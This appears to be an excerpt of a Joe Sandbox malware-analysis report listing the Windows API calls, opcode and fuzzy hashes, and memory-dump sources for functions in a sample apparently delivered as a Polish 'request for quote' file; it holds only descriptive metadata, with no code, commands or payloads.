                                                                                                                                                                                                                                                      • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                                                                                                      • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                                      • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                      • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                                                      • API String ID: 2574300362-58917771
                                                                                                                                                                                                                                                      • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                      • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                                                                                                      • API String ID: 2574300362-3530519716
                                                                                                                                                                                                                                                      • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                                                                                                      • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                                                                                                      • API String ID: 2574300362-275556492
                                                                                                                                                                                                                                                      • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                                                                                                      • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __flush.LIBCMT ref: 00414630
                                                                                                                                                                                                                                                      • __fileno.LIBCMT ref: 00414650
                                                                                                                                                                                                                                                      • __locking.LIBCMT ref: 00414657
                                                                                                                                                                                                                                                      • __flsbuf.LIBCMT ref: 00414682
                                                                                                                                                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                                                                                                                                      • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                      • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CopyVariant$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2286883814-0
                                                                                                                                                                                                                                                      • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                                                                                                                                      • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                                                                                                                                                      • #21.WSOCK32 ref: 004740E0
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1881357543-0
                                                                                                                                                                                                                                                      • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                                                                                                                                      • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                                                                                      • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                                                                                                      • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 004505BF
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Proc$Parent
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2351499541-0
                                                                                                                                                                                                                                                      • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                                                                                                      • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                                                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00461461
                                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 004614AB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$__itow$_wcslen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2875217250-0
                                                                                                                                                                                                                                                      • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                                                                                                      • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                                                                                      • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                                                                                                      • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                                                                                                      • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                                                                                                                                      • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
